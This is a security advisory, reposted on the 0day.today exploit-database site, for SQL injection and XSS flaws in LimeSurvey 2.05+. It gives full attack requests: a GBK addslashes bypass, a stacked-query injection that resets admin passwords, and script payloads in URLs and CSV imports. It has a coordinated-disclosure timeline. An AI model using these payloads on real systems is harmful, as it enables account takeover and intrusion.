0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Lime Survey 2.05+ Build 140618 XSS / SQL Injection Vulnerabilities
Title: Lime Survey Multiple Vulnerabilities Discovery date: 02/07/2014 Release date: 03/07/2014 Vendor Homepage: www.limesurvey.org Version: Lime Survey 2.05+ Build 140618 Tested with: MS SQL Server 2008 Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) [VULNERABILITY INFORMATION] Class: SQL Injection + XSS Category: Web [AFFECTED PRODUCTS] This security vulnerability affects: * Lime Survey 2.05+ Build 140618 [VULNERABILITY DETAILS] Multi-Byte SQL Injection ------------------------ As shown in frontend_helper.php: ****************************************************************** function loadanswers() { global $surveyid; global $thissurvey, $thisstep; global $clienttoken; $clang = Yii::app()->lang; $scid=returnGlobal('scid',true); if (Yii::app()->request->getParam('loadall') == "reload") { $query = "SELECT * FROM {{saved_control}} INNER JOIN {$thissurvey['tablename']} ON {{saved_control}}.srid = {$thissurvey['tablename']}.id WHERE {{saved_control}}.sid=$surveyid\n"; if (isset($scid)) //Would only come from email { $query .= "AND {{saved_control}}.scid={$scid}\n"; } $query .="AND {{saved_control}}.identifier = '".autoEscape($_SESSION['survey_'.$surveyid]['holdname'])."' "; ****************************************************************** the function autoEscape is applied on the holdname parameter, this function is defined in the file common_helper.php ****************************************************************** function autoEscape($str) { if (!get_magic_quotes_gpc()) { return addslashes ($str); } return $str; } ****************************************************************** addslashes can be bypassed using the GBK charset. So sending this request: ****************************************************************** POST /limesurvey/index.php?r=survey/index HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/limesurvey/index.php?r=survey/index Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 125 YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2&loadname=chr(0x87) . "' OR 1=1 -- ";&loadpass=test&loadsecurity=89&sid=713149&loadall=reload ******************************************************************* it is possible to bypass imcomplete survey authentication. Stacked Query SQL Injection --------------------------- Sending this request: ******************************************************************* POST /limesurvey/index.php?r=admin/participants/sa/getParticipants_json HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/limesurvey/index.php?r=admin/participants/sa/displayParticipants Content-Length: 141 Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2&searchcondition=&_search=false&nd=1404300424270&rows=25&page=1&sidx=lastname]; update lime_users set password='880e042d271f08cd3c456f28704702a6b0ad1c7b442f257bf40578112c8e6ffb';+--+P&sord=asc ******************************************************************** it is possible to change the users's password. Reflected XSS ------------- GET /limesurvey/index.php?r=admin%2fparticipants%2fsa%2fgetAttribute_json%2fpid%2f9b0039e2-b346-473d-901f-7010d2bc88c16c2d4<img%20src%3da%20onerror%3dalert(1)>9b6d6fe2f71&YII_CSRF_TOKEN=76fa68bdfde6a997ee64f01726234fd7897e2289&_search=false&nd=140420566784 GET /limesurvey/index.php?r=admin/globalsettings&sa=a"><script>alert(1)</script>a XSS via CSV ----------- it is possible to create a .csv file with inside <script>alert(2)</script>,0 and and upload it with the functionality "Import CSV". [DISCLOSURE TIME-LINE] * 02/07/2014 - Initial vendor contact. * 02/07/2014 - Lime Survey Team confirmed the issue is a new security vulnerability. * 02/07/2014 - Vendor has fixed this vulnerability on Git. * 03/07/2014 - Public disclosure. [DISCLAIMER] The author is not responsible for the misuse of the information provided in this security advisory. The advisory is a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. # 0day.today [2024-12-25] #